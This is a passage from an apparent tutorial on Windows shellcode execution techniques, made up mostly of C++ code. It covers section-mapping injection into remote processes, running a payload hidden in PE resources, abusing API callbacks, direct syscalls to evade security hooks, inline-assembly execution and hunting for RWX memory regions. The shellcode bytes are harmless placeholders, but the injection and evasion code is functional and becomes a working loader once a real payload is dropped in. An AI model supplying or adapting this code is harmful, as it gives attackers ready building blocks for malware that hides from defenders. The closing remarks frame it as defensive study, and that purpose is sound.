NULL // FileHandle (NULL for pagefile-backed section)
);
if (!NT_SUCCESS(status) || hSection == NULL) {
std::cerr << "NtCreateSection failed. Status: " << std::hex << status << std::endl;
CloseHandle(hProcess);
return 1;
}
std::cout << "Section created successfully. Handle: " << hSection << std::endl;
PVOID pLocalView = NULL;
SIZE_T localViewSize = 0; // Let the system decide based on section size
status = pNtMapViewOfSection(
hSection,
GetCurrentProcess(), // Map to current process
&pLocalView,
0, // ZeroBits
0, // CommitSize (0 means map entire section as defined by sectionSize)
NULL, // SectionOffset
&localViewSize, // ViewSize (updated by the call)
ViewUnmap, // InheritDisposition (doesn't share across CreateProcess)
0, // AllocationType (MEM_TOP_DOWN, MEM_LARGE_PAGES etc. 0 for default)
PAGE_READWRITE // Protection for this local view (will write shellcode here)
);
if (!NT_SUCCESS(status) || pLocalView == NULL) {
std::cerr << "NtMapViewOfSection (local) failed. Status: " << std::hex << status << std::endl;
CloseHandle(hSection); CloseHandle(hProcess);
return 1;
}
std::cout << "Local section view mapped at: " << pLocalView << " with size: " << localViewSize << std::endl;
memcpy(pLocalView, shellcode, sizeof(shellcode));
std::cout << "Shellcode written to local section view." << std::endl;
PVOID pRemoteView = NULL;
SIZE_T remoteViewSize = 0;
status = pNtMapViewOfSection(
hSection,
hProcess, // Map to target process
&pRemoteView,
0,
0,
NULL,
&remoteViewSize,
ViewUnmap, // InheritDisposition for remote view
0, // AllocationType
PAGE_EXECUTE_READ // Protection for remote view (needs EXECUTE, READ is usually also fine)
// If shellcode self-modifies, PAGE_EXECUTE_READWRITE
);
if (!NT_SUCCESS(status) || pRemoteView == NULL) {
std::cerr << "NtMapViewOfSection (remote) failed. Status: " << std::hex << status << std::endl;
NtUnmapViewOfSection(GetCurrentProcess(), pLocalView); // Unmap local view
CloseHandle(hSection); CloseHandle(hProcess);
return 1;
}
std::cout << "Remote section view mapped in target process at: " << pRemoteView << " with size: " << remoteViewSize << std::endl;
// Now create a remote thread in the target process to execute from pRemoteView
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteView, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread in target process for section. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Remote thread created to execute shellcode from shared section." << std::endl;
// WaitForSingleObject(hThread, INFINITE); // Optional
CloseHandle(hThread);
}
// Cleanup
NtUnmapViewOfSection(GetCurrentProcess(), pLocalView);
// Remote view cleanup is trickier if code is running from it. Often left or handled by shellcode.
// NtUnmapViewOfSection(hProcess, pRemoteView); // This would typically be done if shellcode is finished.
CloseHandle(hSection); // Section object itself
CloseHandle(hProcess);
return 0;
}
7. Execution from PE Resources: Hiding in Plain Sight
Shellcode can be embedded as a resource within the malware’s own executable. At runtime, the malware loads this resource, allocates executable memory, copies the shellcode, and then executes it directly or by creating a new thread. This is typically a local execution technique, but it’s effective for concealing the payload.
Conceptual C/C++ Code Example:
To use this, you’d typically have a resource file (.rc) linked with your project:
// In a .rc file (e.g., resource.rc)
// #define IDR_SHELLCODE_RESOURCE 101 // Define an ID
// IDR_SHELLCODE_RESOURCE RCDATA "path\\to\\your\\shellcode.bin"
//
// shellcode.bin would be a binary file containing your raw shellcode bytes.
#include <windows.h>
#include <iostream>
// Shellcode defined globally or included (used if resource loading fails or for direct demo)
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Define a resource ID (must match the one in your .rc file if using actual resources)
#define IDR_SHELLCODE_RESOURCE 101
void executeShellcodeLocally(const unsigned char* sc_data, size_t sc_len) {
LPVOID pExecMem = VirtualAlloc(NULL, sc_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pExecMem == NULL) {
std::cerr << "Failed to allocate executable memory. Error: " << GetLastError() << std::endl;
return;
}
std::cout << "Executable memory allocated at: " << pExecMem << std::endl;
memcpy(pExecMem, sc_data, sc_len);
std::cout << "Shellcode copied to executable memory." << std::endl;
std::cout << "Executing shellcode directly via function pointer..." << std::endl;
void (*ShellcodeFunc)() = (void(*)())pExecMem;
// __try/__except can be used for basic error handling around direct execution
__try {
ShellcodeFunc(); // Execute the shellcode
}
__except(EXCEPTION_EXECUTE_HANDLER) {
std::cerr << "Exception occurred during shellcode execution." << std::endl;
}
// Alternatively, create a new thread for more isolated execution:
// HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pExecMem, NULL, 0, NULL);
// if (hThread) {
// std::cout << "Shellcode executing in new thread." << std::endl;
// WaitForSingleObject(hThread, INFINITE);
// CloseHandle(hThread);
// } else {
// std::cerr << "Failed to create thread for shellcode. Error: " << GetLastError() << std::endl;
// }
std::cout << "Shellcode execution finished (or INT3 breakpoint hit / exception)." << std::endl;
VirtualFree(pExecMem, 0, MEM_RELEASE);
}
int main_pe_resource_execution() {
std::cout << "Attempting to load shellcode from PE resource..." << std::endl;
HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_SHELLCODE_RESOURCE), RT_RCDATA);
// For FindResource to work, the calling module (the .exe) must have the resource.
// If NULL is passed as HMODULE, it searches the .exe.
// GetModuleHandle(NULL) can also be used for the current executable.
if (hRes == NULL) {
std::cerr << "FindResource failed. Error: " << GetLastError() << std::endl;
std::cerr << "Ensure resource IDR_SHELLCODE_RESOURCE (101) with type RCDATA exists." << std::endl;
std::cout << "Falling back to global shellcode array for demonstration." << std::endl;
executeShellcodeLocally(shellcode, sizeof(shellcode)); // Fallback
return 1;
}
HGLOBAL hResLoad = LoadResource(NULL, hRes);
if (hResLoad == NULL) {
std::cerr << "LoadResource failed. Error: " << GetLastError() << std::endl;
return 1;
}
LPVOID pShellcodeRes = LockResource(hResLoad);
if (pShellcodeRes == NULL) {
std::cerr << "LockResource failed. Error: " << GetLastError() << std::endl;
// FreeResource not needed for LockResource on modern Windows if LoadResource succeeded
return 1;
}
DWORD dwSize = SizeofResource(NULL, hRes);
if (dwSize == 0) {
std::cerr << "SizeofResource is zero. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Shellcode resource loaded successfully. Size: " << dwSize << " bytes." << std::endl;
executeShellcodeLocally((const unsigned char*)pShellcodeRes, dwSize);
// FreeResource(hResLoad); // Not strictly necessary for RCDATA after LockResource on modern Windows,
// as the resource remains loaded with the module.
// However, some old documentation might suggest it.
return 0;
}
8. Shellcode Execution via Callback Functions: A Hooked Call
Many Windows API functions accept a callback function pointer. Attackers can abuse this by allocating memory for their shellcode, copying it there, and then calling a legitimate Windows API function, passing the shellcode’s address as the callback argument. When the API attempts to call its callback, it inadvertently executes the shellcode. The shellcode must be crafted to match the callback’s signature and calling convention.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode placeholder. For a real callback, it MUST match the expected function signature
// and calling convention (e.g., __stdcall for many WinAPI callbacks).
// Our simple NOPs, INT3, RET (0xC3) might work for some simple callbacks if stack isn't heavily used by args.
// A proper shellcode for a callback like EnumWindowsProc would be:
// ; HWND hwnd, LPARAM lParam passed on stack
// ; ... do malicious stuff ...
// ; Clean up stack if necessary (e.g. ret 8 for two DWORD/PVOID args for stdcall)
// ; Return TRUE/FALSE in EAX
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 }; // Simple version
// Shellcode crafted for EnumWindowsProc (BOOL CALLBACK(HWND, LPARAM))
// This is a conceptual representation. Actual assembly would be needed.
// This shellcode just hits INT3 and then returns TRUE (mov eax, 1; ret 8)
unsigned char callback_shellcode[] = {
0xCC, // INT3 (Breakpoint to observe)
0xB8, 0x01, 0x00, 0x00, 0x00, // mov eax, 1 (Return TRUE)
0xC2, 0x08, 0x00 // ret 8 (Clean up 2*4=8 bytes of arguments from stack for stdcall)
};
int main_callback_execution() {
LPVOID pExecMem = VirtualAlloc(NULL, sizeof(callback_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pExecMem == NULL) {
std::cerr << "VirtualAlloc for callback failed. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Shellcode memory allocated at: " << pExecMem << std::endl;
memcpy(pExecMem, callback_shellcode, sizeof(callback_shellcode));
std::cout << "Shellcode copied to executable memory." << std::endl;
std::cout << "Attempting to execute shellcode via EnumWindows callback..." << std::endl;
// The shellcode at pExecMem will be called for each top-level window.
// It must be written to handle the arguments (HWND, LPARAM) and calling convention (stdcall for EnumWindowsProc).
EnumWindows((WNDENUMPROC)pExecMem, NULL); // Pass shellcode address as callback
// Other examples of APIs with callbacks:
// SetTimer(NULL, 0, 1000, (TIMERPROC)pExecMem); // TIMERPROC is VOID CALLBACK(HWND, UINT, UINT_PTR, DWORD)
// LineDDA(0,0,0,0, (LINEDDAPROC)pExecMem, NULL); // LINEDDAPROC is VOID CALLBACK(int, int, LPARAM)
// GrayString(NULL, NULL, (GRAYSTRINGPROC)pExecMem, 0, 0,0,0,0); // GRAYSTRINGPROC is BOOL CALLBACK(HDC, LPARAM, int)
std::cout << "API call with callback completed. If shellcode executed, INT3 breakpoint might have occurred." << std::endl;
VirtualFree(pExecMem, 0, MEM_RELEASE);
return 0;
}
9. Calling Syscalls Directly or Indirectly: Bypassing User-Mode Hooks
To evade security software that places hooks on high-level Windows APIs, malware can directly invoke the underlying system calls that transition execution from user mode to kernel mode. Shellcode can be crafted to perform these direct syscalls, bypassing security monitoring. Tools like SysWhispers, Hell’s Gate, or Halo’s Gate aid in this process by dynamically finding syscall numbers and providing assembly stubs.
Conceptual C/C++ Code Example:
This is highly conceptual as it requires assembly. The C++ code would typically prepare arguments and then call an assembly stub.
#include <windows.h>
#include <iostream>
#include <winternl.h> // For NTSTATUS
// This is a placeholder for shellcode that would itself contain direct syscalls.
// Or, it's a C program that uses assembly stubs for syscalls.
// unsigned char syscall_shellcode[] = { /* ... assembly ... */ 0xCC, 0xC3 };
// Example: Using a hypothetical assembly function for NtAllocateVirtualMemory via syscall
// This function would be defined in an .asm file or via advanced inline assembly.
/*
EXTERN_C NTSTATUS MyNtAllocateVirtualMemory_Syscall(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
// ASM implementation (conceptual for x64):
// MyNtAllocateVirtualMemory_Syscall PROC
// mov r10, rcx ; Windows x64 syscall convention
// mov eax, SYSCALL_NUMBER_NtAllocateVirtualMemory ; Actual syscall number
// syscall
// ret
// MyNtAllocateVirtualMemory_Syscall ENDP
*/
// For demonstration, we'll just outline the idea.
// A real implementation would use a tool like SysWhispers to generate the stubs.
// Let's assume we have a way to get the syscall number (this is complex and OS-version dependent)
// For example, from a tool like SysWhispers output or by parsing ntdll.dll.
// WORD GetSyscallNumber(LPCSTR functionName) { /* ... complex logic ... */ return 0x18; // Example for NtAllocateVirtualMemory }
int main_direct_syscalls() {
std::cout << "Direct Syscall technique: This example is conceptual." << std::endl;
std::cout << "It requires assembly language or tools like SysWhispers/Hell's Gate." << std::endl;
// 1. Obtain syscall numbers (e.g., for NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx)
// This is typically done by parsing ntdll.dll at runtime or using known values for specific OS versions.
// WORD syscallAllocate = GetSyscallNumberFor("NtAllocateVirtualMemory");
// WORD syscallWrite = GetSyscallNumberFor("NtWriteVirtualMemory");
// WORD syscallCreate = GetSyscallNumberFor("NtCreateThreadEx");
// 2. Prepare arguments for the syscall.
// 3. Call an assembly stub that sets up registers and executes the 'syscall' instruction.
/*
HANDLE targetProcess = GetCurrentProcess(); // Or a remote process handle obtained via other means
PVOID allocatedMemory = NULL;
SIZE_T size = sizeof(shellcode); // Assuming 'shellcode' is defined elsewhere
NTSTATUS status;
// Conceptual call to an assembly stub for NtAllocateVirtualMemory
// status = AsmNtAllocateVirtualMemory(syscallAllocate, targetProcess, &allocatedMemory, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (NT_SUCCESS(status) && allocatedMemory) {
std::cout << "Memory allocated via conceptual direct syscall at: " << allocatedMemory << std::endl;
// Conceptually write shellcode using another direct syscall (AsmNtWriteVirtualMemory)
// status = AsmNtWriteVirtualMemory(syscallWrite, targetProcess, allocatedMemory, shellcode, sizeof(shellcode), NULL);
if (NT_SUCCESS(status)) {
std::cout << "Shellcode written via conceptual direct syscall." << std::endl;
HANDLE hThread = NULL;
// Conceptually create thread using direct syscall (AsmNtCreateThreadEx)
// status = AsmNtCreateThreadEx(syscallCreate, &hThread, THREAD_ALL_ACCESS, NULL, targetProcess, allocatedMemory, NULL, FALSE, 0, 0, 0, NULL);
if (NT_SUCCESS(status) && hThread) {
std::cout << "Thread created via conceptual direct syscall." << std::endl;
// WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}
}
// Conceptually free memory using direct syscall (AsmNtFreeVirtualMemory)
// AsmNtFreeVirtualMemory(syscallFree, targetProcess, &allocatedMemory, &size_zero_for_release, MEM_RELEASE);
} else {
std::cout << "Conceptual direct syscall for allocation failed. Status: " << std::hex << status << std::endl;
}
*/
std::cout << "For practical implementations, refer to specialized tools that generate syscall stubs." << std::endl;
return 0;
}
10. Using Inline Assembly: Integrated Malice
Shellcode can be embedded directly within a C/C++ program’s source code using inline assembly blocks (__asm for MSVC, asm volatile for GCC/Clang). This allows the shellcode to be executed within the program’s own process, potentially avoiding detectable memory allocation functions if the shellcode is placed in an executable section or if memory is allocated discreetly.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode to be executed via inline assembly.
// This is a simple NOP sled, INT3, RET.
unsigned char inline_asm_shellcode[] = {
0x90, 0x90, 0x90, 0x90, // NOPs
0xCC, // INT3 (breakpoint)
0xC3 // RET
};
void execute_via_inline_assembly() {
std::cout << "Preparing to execute shellcode via inline assembly..." << std::endl;
// For Data Execution Prevention (DEP) compatibility, shellcode usually needs to be in executable memory.
// If inline_asm_shellcode is in a data segment, this VirtualAlloc is crucial.
// If the compiler places it in a .text (code) segment, this might not be needed, but it's safer.
LPVOID pExecMem = VirtualAlloc(NULL, sizeof(inline_asm_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pExecMem == NULL) {
std::cerr << "Failed to allocate executable memory for inline asm. Error: " << GetLastError() << std::endl;
return;
}
memcpy(pExecMem, inline_asm_shellcode, sizeof(inline_asm_shellcode));
std::cout << "Shellcode copied to executable memory at: " << pExecMem << std::endl;
std::cout << "Jumping to shellcode..." << std::endl;
#if defined(_MSC_VER) // MSVC compiler
// For 32-bit MSVC, __asm is straightforward.
// For 64-bit MSVC, inline assembly is very limited; usually requires .asm files.
// This example is more suited for 32-bit compilation with MSVC.
void* shellcode_target_ptr = pExecMem;
__try {
__asm {
mov eax, shellcode_target_ptr // Load address of shellcode into EAX
call eax // Call the address in EAX
}
} __except(EXCEPTION_EXECUTE_HANDLER) {
std::cerr << "Exception during MSVC inline asm execution." << std::endl;
}
#elif defined(__GNUC__) || defined(__clang__) // GCC/Clang
// GCC/Clang inline assembly (works for both 32-bit and 64-bit, syntax is different)
void (*ShellcodeFunc)() = (void(*)())pExecMem;
__try { // Using SEH with GCC/Clang requires specific compiler flags/setup e.g. -fseh
// Or use signal handling on POSIX-like systems if not Windows.
// For simplicity, direct call here.
ShellcodeFunc();
} __except(EXCEPTION_EXECUTE_HANDLER) { // This SEH is MSVC specific.
// On GCC/Clang for Windows, you might need to set up SEH differently or rely on OS handling.
std::cerr << "Exception during GCC/Clang shellcode execution (SEH might not be standard)." << std::endl;
}
// More direct GCC inline assembly:
// __asm__ volatile (
// "call *%0"
// : /* no output operands */
// : "r"(pExecMem) /* input operand: shellcode address in any general-purpose register */
// : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11", "memory" /* clobbered registers and memory */
// );
#else
std::cout << "Inline assembly not specifically demonstrated for this compiler." << std::endl;
std::cout << "Falling back to function pointer call for demonstration." << std::endl;
void (*ShellcodeFuncFallback)() = (void(*)())pExecMem;
__try {
ShellcodeFuncFallback();
} __except(EXCEPTION_EXECUTE_HANDLER) {
std::cerr << "Exception during fallback function pointer execution." << std::endl;
}
#endif
std::cout << "Inline assembly shellcode execution attempt finished." << std::endl;
VirtualFree(pExecMem, 0, MEM_RELEASE);
}
int main_inline_assembly() {
execute_via_inline_assembly();
return 0;
}
11. RWX Memory Hunting: Finding Pre-Existing Loopholes
Instead of allocating new memory, malware can actively search for existing memory regions in processes that already have Read, Write, and Execute (RWX) permissions. While rare in well-behaved processes, finding such a region allows the malware to write its shellcode directly into it and then execute it, potentially evading detection mechanisms that look for specific memory allocation or permission change APIs like VirtualAllocEx or VirtualProtectEx.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous examples)
int main_rwx_hunting() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
if (targetPID == 0) {
std::cerr << "Target PID not obtained for RWX hunting." << std::endl;
return 1;
}
// Required permissions: PROCESS_QUERY_INFORMATION for VirtualQueryEx,
// PROCESS_VM_WRITE for WriteProcessMemory, PROCESS_CREATE_THREAD for CreateRemoteThread.
// PROCESS_VM_READ is also implicitly useful.
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for RWX hunting. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Hunting for RWX memory in PID: " << targetPID << std::endl;
unsigned char* pCurrentAddress = NULL; // Start scanning from address 0
MEMORY_BASIC_INFORMATION mbi;
bool found_rwx_region = false;
LPVOID rwx_execution_address = NULL;
// Iterate through the process's memory regions
while (VirtualQueryEx(hProcess, pCurrentAddress, &mbi, sizeof(mbi)) == sizeof(mbi)) {
// Check if the memory region is committed, and has PAGE_EXECUTE_READWRITE protection
if (mbi.State == MEM_COMMIT && mbi.Protect == PAGE_EXECUTE_READWRITE) {
// Check if the region is large enough for our shellcode
if (mbi.RegionSize >= sizeof(shellcode)) {
std::cout << "Found potential RWX region at: " << mbi.BaseAddress
<< " with size: " << mbi.RegionSize << " bytes." << std::endl;
// For PoC, use the first suitable region found.
// A more sophisticated malware might check for "empty" space or other heuristics.
rwx_execution_address = mbi.BaseAddress; // Could also be an offset within this region
found_rwx_region = true;
break;
}
}
// Move to the next memory region
pCurrentAddress += mbi.RegionSize;
if ((DWORD_PTR)pCurrentAddress < (DWORD_PTR)mbi.BaseAddress + mbi.RegionSize) { // Check for overflow/wrap-around
std::cerr << "Memory scanning error or end of address space." << std::endl;
break;
}
}
if (found_rwx_region && rwx_execution_address) {
std::cout << "Attempting to write shellcode to RWX region: " << rwx_execution_address << std::endl;
SIZE_T bytesWritten;
if (!WriteProcessMemory(hProcess, rwx_execution_address, shellcode, sizeof(shellcode), &bytesWritten) || bytesWritten != sizeof(shellcode)) {
std::cerr << "Failed to write shellcode to RWX region. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Shellcode (" << bytesWritten << " bytes) written to RWX region." << std::endl;
// Execute the shellcode in the RWX region
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rwx_execution_address, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread in RWX region. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Remote thread created in RWX region. Shellcode should execute." << std::endl;
// WaitForSingleObject(hThread, INFINITE); // Optional
CloseHandle(hThread);
}
}
} else {
std::cout << "No suitable RWX memory region found or region not large enough for the shellcode." << std::endl;
}
CloseHandle(hProcess);
return 0;
}
The Ever-Evolving Landscape
These techniques represent a dynamic battleground between attackers and defenders. Attackers constantly refine their methods, varying in complexity, stealth, and the specific Windows functionalities they exploit. For security professionals, understanding these diverse approaches is absolutely critical for developing effective detection and mitigation strategies.